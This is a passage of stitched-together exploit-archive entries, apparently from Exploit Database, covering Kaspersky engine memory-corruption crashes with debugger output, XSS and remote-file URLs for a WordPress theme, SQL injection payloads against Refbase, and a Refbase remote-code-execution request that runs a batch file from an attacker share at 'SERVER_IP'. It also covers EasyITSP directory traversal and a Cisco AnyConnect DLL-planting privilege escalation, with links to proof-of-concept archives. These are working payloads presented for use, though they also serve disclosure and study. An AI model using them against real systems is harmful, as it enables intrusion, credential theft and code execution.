Which is less than 0x3f1, the size parameter. Those values are directly from the executable being scanned.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38283.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=519
Fuzzing the DEX file format found a crash that loads a function pointer from an attacker controlled pointer, on Windows this results in a call to an unmapped address. This is obviously exploitable for remote, zero-interaction code execution as NT AUTHORITY\SYSTEM on any system with Kaspersky Antivirus. I've tested Windows, Linux, Mac and a product using the Kaspersky SDK (ZoneAlarm Pro), all were exploitable.
(5dc.990): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=9c000000 ebx=00000000 ecx=053ef3ec edx=00020009 esi=04130d40 edi=800000d8
eip=9c000000 esp=053eec14 ebp=053eec74 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
9c000000 ?? ???
0:026> kv
ChildEBP RetAddr Args to Child
WARNING: Frame IP not in any known module. Following frames may be wrong.
053eec10 1740927e 04137af0 04137ac8 04130d40 0x9c000000
053eecb8 70118a64 04130d40 00000002 04130d40 0x1740927e
053eecd0 70116a1c 04130d40 0000234c 00000001 kavbase_kdl!KLAV_Engine_Create+0x17a62
053eed80 70113829 04130d40 0500234c 00000000 kavbase_kdl!KLAV_Engine_Create+0x15a1a
053eedc0 70117156 04130d40 107407b4 00000001 kavbase_kdl!KLAV_Engine_Create+0x12827
053eee6c 70113926 04130d40 20000001 00000000 kavbase_kdl!KLAV_Engine_Create+0x16154
053eee94 701167f2 04130d40 000001e3 053eeed4 kavbase_kdl!KLAV_Engine_Create+0x12924
053eeea4 70112c28 04130d40 00000067 0e5100a2 kavbase_kdl!KLAV_Engine_Create+0x157f0
053eeed4 70112cef 053eeee0 04130d40 16d30ae0 kavbase_kdl!KLAV_Engine_Create+0x11c26
0:026> .frame /c 1
01 053eecb8 70118a64 0x1740927e
eax=9c000000 ebx=00000000 ecx=053ef3ec edx=00020009 esi=04130d40 edi=800000d8
eip=1740927e esp=053eec18 ebp=053eec74 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206
1740927e 83c404 add esp,4
0:026> ub
17409269 8b45fc mov eax,dword ptr [ebp-4]
1740926c 85c0 test eax,eax
1740926e 7411 je 17409281
17409270 c745fc00000000 mov dword ptr [ebp-4],0
17409277 8b10 mov edx,dword ptr [eax]
17409279 50 push eax
1740927a 8b02 mov eax,dword ptr [edx] <-- corrupt attacker controlled pointer
1740927c ffd0 call eax <-- attacker gains control of execution
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38284.zip
source: https://www.securityfocus.com/bid/57676/info
The flashnews Theme for WordPress is prone to multiple input-validation vulnerabilities.
An attacker may leverage these issues to cause denial-of-service conditions, disclose sensitive information, upload arbitrary files to the affected computer, or execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
http://www.example.com/wp-content/themes/flashnews/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg [XSS]
http://www.example.com/wp-content/themes/flashnews/thumb.php?src=http://site/big_file&h=1&w=1
http://www.example.com/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com/big_file&h=1&w=1
http://www.example.com/wp-content/themes/flashnews/thumb.php?src=http://site.badsite.com/shell.php
http://www.example.com/wp-content/themes/flashnews/includes/test.php
http://www.example.com/wp-content/themes/flashnews/includes/test.php?a[]=%3Cscript%3Ealert(document.cookie)%3C/script%3E [XSS]
# Exploit Title: Refbase <= 0.9.6 rss.php where parameter SQL Injection
# Google Dork: "powered by refbase"
# Date: 23 Sep 2015
# Exploit Author: Mohab Ali
# @0xAli
# Vendor Homepage: http://www.refbase.net/index.php/Web_Reference_Database
# Software Link: http://sourceforge.net/projects/refbase/
# Reference: https://www.kb.cert.org/vuls/id/374092
# Version: 0.8, 0.9, 0.9.5, 0.9.6
# Tested on: WAMP (Windows)
# CVE : CVE-2015-6009
# Solution: Vulnerability hasn't been patched yet.
**Summary **
Refbase v 0.9.6 and earlier versions have an SQL injection vulnerability because of the insufficient validation when passing user supplied input to be passed to the database.
** Vulnerable code **
################################################################################
#Line 35 : $queryWhereClause = $_REQUEST['where'];
#Line 86 : $sanitizedWhereClause = extractWHEREclause(" WHERE " . $queryWhereClause);
#Line 100: $sqlQuery .= " FROM $tableRefs WHERE " . $sanitizedWhereClause;
#Line 123: $result = queryMySQLDatabase($query);
################################################################################
** Exploit POCs **
/rss.php?where=1+and+5=(substr(@@version,1,1))-- -If it’s true then the mysql version is > 5
/rss.php?where='nonexistent'+union+all(select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,concat('version:',@@version,''),34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50)-- -
/rss.php?where='nonexistent'+union+all(select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41)-- -
[!] Version 0.8 and 0.9 provide no validation, but versions 0.9.5 and 0.9.6 provide some filtering so you better let sqlmap handle it.
[!] The GET parameter "where" is vulnerable to SQL injection despite being filtered by a custom function called extractWHEREclause() it’s still can be bypassed to inject other queries.
The extractWHEREclause() function which is defined in include.inc.php and it removes any additional MySQL keywords.
preg_replace("/^.*? WHERE (.+?)(?= ORDER BY| LIMIT| GROUP BY| HAVING| PROCEDURE| FOR UPDATE| LOCK IN|[ ;]+(SELECT|INSERT|UPDATE|DELETE|CREATE|ALTER|DROP|FILE)\b|$).*?$/i", "\\1", $query);
But it can be bypassed.
# Contacted vendor: 23 Dec 2014
# Public disclosure: 23 Sep 2015
################################################################################
# Exploit Title: Refbase <= 0.9.6 install.php defaultCharacterSet parameter SQL Injection
# Google Dork: "powered by refbase"
# Public Disclosure Date: 21 Sep 2015
# Exploit Author: Mohab Ali
# @0xAli
# Vendor Homepage: http://www.refbase.net/index.php/Web_Reference_Database
# Software Link: http://sourceforge.net/projects/refbase/
# Reference: https://www.kb.cert.org/vuls/id/374092
# Version: 0.8, 0.9, 0.9.5, 0.9.6.
# Tested on: WAMP (Windows)
# CVE : CVE-2015-6009
# Solution: Remove the install.php file after the installation
**Summary **
Refbase v 0.9.6 and earlier versions have an SQL injection vulnerability because of the insufficient validation when passing user supplied input to be passed to the database.
[!] You have to know the correct MySQL credentials.
** Vulnerable code **
################################################################################
#Line 77 : $defaultCharacterSet = $_POST['defaultCharacterSet'];
#Line 407: $queryCreateDB = $queryCreateDB . " DEFAULT CHARACTER SET " . $defaultCharacterSet;
#Line 424: if (!($result = @ mysql_query ($queryCreateDB, $connection)))
################################################################################
** Exploit POC **
Request:
POST /install.php
formType=install&submit=Install&adminUserName=root&adminPassword=pass&pathToMYSQL=C:\mysql5.6.17\bin\mysql.exe&databaseStructureFile=./install.sql&pathToBibutils=&defaultCharacterSet=SQL QUERY HERE&submit=Install
################################################################################
# Exploit Title: Refbase <= 0.9.6 install.php pathToMYSQL parameter RCE (Windows)
# Google Dork: "powered by refbase"
# Public Disclosure Date: 21 Sep 2015
# Exploit Author: Mohab Ali
# @0xAli
# Vendor Homepage: http://www.refbase.net/index.php/Web_Reference_Database
# Software Link: http://sourceforge.net/projects/refbase/
# Reference: https://www.kb.cert.org/vuls/id/374092
# Version: 0.9.6 and earlier. 0.6.1 and prior versions are not vulnerable.
# Tested on: Windows
# CVE : CVE-2015-6008
# Solution: Remove the install.php file after the installation
**Summary **
Refbase v 0.9.6 and earlier versions have an RCE vulnerability because of the insufficient validation when passing user supplied input to be executed by the system.
[!] You have to know the correct MySQL credentials and this doesn't appear to be exploitable on Linux since (AFAIK) it can't execute scripts remote smb shares by default.
** Vulnerable code **
################################################################################
#Line 62: $pathToMYSQL = $_POST['pathToMYSQL'];
#Line 67: $databaseStructureFile = $_POST['databaseStructureFile'];
#Line 429: exec($pathToMYSQL . " -h " . $hostName . " -u " . $adminUserName . " -p" .$adminPassword . " --database=" . $databaseName . " < " . $databaseStructureFile . " 2>&1", $resultArray);
################################################################################
[*] pathToMYSQL and databaseStructureFile can't be empty, and has to be real file. And they can't contain ';' or '|'
[*] To exploit this in Windows you can provide an executable on a remote share and execute it.
** Exploit POC **
Request:
formType=install&submit=Install&adminUserName=root&adminPassword=123&pathToMYSQL=%5C%5CSERVER_IP%5CShare%5Cexec.bat&databaseStructureFile=.%2Finstall.sql&pathToBibutils=&defaultCharacterSet=latin1&submit=Install
Executed command:
\\SERVER_IP\Share\exec.bat -h localhost -u root -p123 --database=literature < ./install.sql 2>&1
source: https://www.securityfocus.com/bid/57741/info
EasyITSP is prone to a directory-traversal vulnerability because it fails to properly sanitize user-supplied input.
Remote attackers can use specially crafted requests with directory-traversal sequences ('../') to access arbitrary files in the context of the application. This may aid in further attacks.
EasyITSP 2.0.7 and prior versions are vulnerable.
http://www.example.com/WEB/customer/voicemail.php?currentpage=phones&folder=../../
Source: https://code.google.com/p/google-security-research/issues/detail?id=460
Cisco AnyConnect Secure Mobility Client v3.1.08009 Elevation of Privilege
Platform: Windows 8.1 Update, Client version 3.1.08009 (tested on 32 bit only)
Class: Elevation of Privilege
Summary:
The fix for CVE-2015-4211 is insufficient which allows a local application to elevate to local system through the CMainThread::launchDownloader command.
Description:
This is directly related to http://tools.cisco.com/security/center/viewAlert.x?alertId=39466. The fix for this issue seemed to be modifying the file verification process to only allow a signed file which also has in its version information the original filename of vpndownloader.exe. This, along with the name change makes it clear you only want to execute the VPN Downloader application. However the code doesn’t limit the location of the executable file, so one exploitation vector is DLL planting. The downloader loads a lot of DLLs from the executable directory first, so by copying the vpndownloader.exe file from Program Files to a temporary directory and dropping an appropriately named DLL you can get code execution as SYSTEM. One such DLL is dbghelp.dll which is loaded explicitly by the downloader using LoadLibrary, but there are many more.
Even if by luck the executable wasn’t vulnerable to DLL planting there’s many other potential issues, for example even though a lock is made on the executable file during signature verification it’s possible to use symbolic links to exploit this as a race condition and switch the executable file after verification has completed. There’s many other possibilities as well. I’d recommend that if you’re really only supposed to be executing vpndownloader you only execute it from the secure program files directory which would eliminate this issue.
This was based on work previous done by Kostya Kortchinsky.
Proof of Concept:
The PoC demonstrates the vulnerability and should create a copy of CMD.EXE running at SYSTEM on the current user’s desktop. I’ve provided source for the exploit.exe written in C# 4 and the dbghelp.dll in C++, as well as binaries. It should run on 32 and 64 bit platforms but I’ve only tested it on 32 bit.
1) Copy the exploit.exe and dbghelp.dll to a location on a local hard disk which the current user can write to.
2) Execute exploit.exe as the normal user
3) A command prompt should appear running at SYSTEM
Expected Result:
The service rejects the executable request
Observed Result:
The service executes the file from the temporary directory and allows for elevation.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38289.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=518
A remotely exploitable stack buffer overflow in ThinApp container parsing. Kaspersky Antivirus (I've tested version 15 and 16) and other products using the Kaspersky Engine (such as ZoneAlarm) are affected.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/38287.zip